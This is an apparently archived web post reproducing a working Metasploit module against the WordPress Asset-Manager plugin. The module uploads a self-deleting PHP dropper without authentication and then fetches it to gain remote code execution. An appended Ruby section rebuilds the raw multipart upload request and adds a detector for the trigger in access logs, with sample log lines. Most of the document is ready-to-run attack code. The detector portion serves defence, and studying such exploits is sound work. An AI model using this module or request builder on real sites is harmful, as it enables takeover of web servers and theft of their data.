WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, taken from the Metasploit exploit library, exploits a vulnerability found in version 2.0 and below of the WordPress Asset-Manager plugin. It allows PHP files to be uploaded: a user can upload a file to a temp directory without authentication, which leads to arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # PhpEXE provides get_write_exec_payload, which wraps the selected payload
  # in a PHP dropper (self-deleting when :unlink_self is set).
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random .php name so the dropped file does not collide with earlier runs.
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # upload.php expects a single multipart part named "Filedata".
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Rex::MIME::Message#to_s emits a leading CRLF before the first boundary; strip it.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # The plugin echoes the stored filename back on success.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Trigger the dropper from the plugin's temp directory.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
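As an added example (not part of the original post or of the Metasploit module above), the Ruby below reconstructs the two requests the module sends, the multipart POST to upload.php and the GET of the dropped file under wp-content/uploads/assets/temp/, and runs a small detector for that pattern over access-log lines. The two URL paths come from the module; the log format, IP addresses, timestamps, file names and helper names are assumptions constructed for the example.

```ruby
# Added example, not part of the page's Metasploit module: reconstruct the
# module's two requests and detect them in web-server access logs.
# Everything below except the two URL paths is assumed/constructed.
require 'securerandom'

# Paths taken from the module: the unauthenticated upload handler and the
# directory the plugin writes uploaded files into.
UPLOAD_PATH = 'wp-content/plugins/asset-manager/upload.php'
TEMP_PATH   = 'wp-content/uploads/assets/temp/'

# Build the multipart/form-data body the module sends: one part named
# "Filedata" carrying the file. Returns [content_type, body].
def build_upload_body(filename, content, boundary = nil)
  boundary ||= "----AssetManager#{SecureRandom.hex(8)}"
  body = "--#{boundary}\r\n" \
         "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{filename}\"\r\n" \
         "Content-Type: application/octet-stream\r\n\r\n" \
         "#{content}\r\n" \
         "--#{boundary}--\r\n"
  ["multipart/form-data; boundary=#{boundary}", body]
end

# Raw POST request as it appears on the wire (for replaying through a proxy
# or a test server). base_uri is the WordPress root, e.g. "/wordpress".
def raw_upload_request(host, base_uri, filename, content, boundary = nil)
  base_uri += '/' unless base_uri.end_with?('/')
  ctype, body = build_upload_body(filename, content, boundary)
  "POST #{base_uri}#{UPLOAD_PATH} HTTP/1.1\r\n" \
  "Host: #{host}\r\n" \
  "Content-Type: #{ctype}\r\n" \
  "Content-Length: #{body.bytesize}\r\n\r\n" + body
end

# Same success test the module applies: HTTP 200 and the stored filename
# echoed back in the response body.
def upload_succeeded?(status, body, filename)
  status == 200 && body.include?(filename)
end

# ---- detection -----------------------------------------------------------
# Apache/nginx "combined" log format (assumed).
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
TEMP_PHP_RE = %r{#{Regexp.escape(TEMP_PATH)}([^/?]+\.php)(?=\z|[?/])}

# Flag every GET of a .php file under the temp directory and record whether
# the same client POSTed to upload.php earlier in the log. The GET is flagged
# even without a matching POST: the dropper persists on disk, so the upload
# and the trigger can come from different addresses.
def detect_asset_manager_uploads(log_lines)
  posted = Hash.new { |h, k| h[k] = [] }   # client ip => upload timestamps
  hits = []
  log_lines.each do |line|
    next unless (m = LOG_RE.match(line))
    ip, path = m[:ip], m[:path]
    if m[:method] == 'POST' && path.include?(UPLOAD_PATH)
      posted[ip] << m[:ts]
    elsif m[:method] == 'GET' && (f = TEMP_PHP_RE.match(path))
      hits << { ip: ip, file: f[1], status: m[:status].to_i, exec_at: m[:ts],
                upload_seen: posted.key?(ip), upload_at: posted.fetch(ip, []).last }
    end
  end
  hits
end

# Constructed sample log: one full exploit sequence, one benign image fetch,
# and one trigger attempt with no visible upload.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:02 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzwd.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:21:10 +0800] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:22:33 +0800] "GET /wordpress/wp-content/uploads/assets/temp/x.php?cmd=id HTTP/1.1" 404 0 "-" "curl/7.26"
LOG

if __FILE__ == $0
  puts raw_upload_request('wp.example', '/wordpress', 'kqzwd.php', '<?php echo "ok"; ?>')
  detect_asset_manager_uploads(SAMPLE_LOG.lines).each { |h| puts h.inspect }
end
```

The detector deliberately keys on the trigger rather than the upload: a POST to upload.php alone may be the plugin's own behaviour, but a request for a .php file under the plugin's temp directory is the step that executes code, and the 404 on the last sample line still tells you someone tried.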